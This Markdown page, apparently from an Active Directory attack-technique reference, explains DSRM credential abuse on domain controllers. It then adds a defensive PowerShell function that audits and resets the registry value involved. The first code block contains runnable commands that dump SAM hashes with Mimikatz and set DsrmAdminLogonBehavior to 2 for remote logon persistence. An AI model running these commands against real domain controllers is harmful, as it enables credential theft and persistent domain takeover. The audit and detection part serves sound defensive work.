18 lines
1010 B
Markdown
# Password - DSRM Credentials
> Directory Services Restore Mode (DSRM) is a safe mode boot option for Windows Server domain controllers. DSRM allows an administrator to repair or restore an Active Directory database.
The DSRM account is the local Administrator account on each DC. With admin privileges on the machine, Mimikatz can dump the local Administrator hash from the SAM. Modifying a registry value (`DsrmAdminLogonBehavior`) then makes this password usable for normal logons, so the local Administrator account can be used to access the DC remotely.
```ps1
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

# Check if the key exists and get the value
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior

# Create key with value "2" if it doesn't exist
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD

# Change value to "2"
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2
```
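The registry value the technique relies on is also what a defender should audit. The following is an added example (not code from the original page) that checks `DsrmAdminLogonBehavior` on a DC, interprets the value (absent or 0 is the default, 2 is the setting the technique above leaves behind) and can optionally remove the value to restore the default. The function name `Test-DsrmLogonBehavior` and the `-Remediate` switch are assumptions for this example; it must run with local administrator rights on the DC.

```powershell
# Added example, not part of the original page.
# Audits HKLM\SYSTEM\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior on the local DC.
# Meaning of the value (absent => 0):
#   0 = DSRM Administrator can only log on while the DC is booted into DSRM (default)
#   1 = can also log on while the AD DS service is stopped
#   2 = can log on at any time (the persistence setting described above)
function Test-DsrmLogonBehavior {
    [CmdletBinding()]
    param(
        # Assumed switch: remove a non-default value instead of only reporting it.
        [switch]$Remediate
    )

    $keyPath   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $valueName = 'DsrmAdminLogonBehavior'

    # Get-ItemProperty returns nothing (no error) when the value is absent.
    $item    = Get-ItemProperty -Path $keyPath -Name $valueName -ErrorAction SilentlyContinue
    $current = if ($null -eq $item) { 0 } else { [int]$item.$valueName }

    $meaning = switch ($current) {
        0       { 'DSRM admin logon only in DSRM (default)' }
        1       { 'DSRM admin logon allowed while AD DS is stopped' }
        2       { 'DSRM admin logon allowed at any time (persistence indicator)' }
        default { "unexpected value $current" }
    }

    $result = [pscustomobject]@{
        Computer   = $env:COMPUTERNAME
        ValueSet   = ($null -ne $item)
        Value      = $current
        Meaning    = $meaning
        Suspicious = ($current -ne 0)
        Remediated = $false
    }

    if ($Remediate -and $result.Suspicious) {
        # Deleting the value returns the DC to the default behaviour (0).
        Remove-ItemProperty -Path $keyPath -Name $valueName -ErrorAction Stop
        Write-Warning "Removed $valueName from $keyPath on $($result.Computer) (was $current)"
        $result.Remediated = $true
    }

    $result
}

# Report only:
Test-DsrmLogonBehavior

# Example of running the same check on every DC in the domain (requires the
# ActiveDirectory module and WinRM access to the DCs):
# Get-ADDomainController -Filter * | ForEach-Object {
#     Invoke-Command -ComputerName $_.HostName -ScriptBlock ${function:Test-DsrmLogonBehavior}
# }
```

Any value other than 0 on a DC that is not being actively recovered deserves investigation, since the DSRM password is rarely changed and is not covered by domain password policy. For ongoing detection, enabling the "Audit Registry" subcategory together with a SACL on the `Lsa` key makes creation or modification of this value surface as Security event 4657, which can be forwarded to a SIEM.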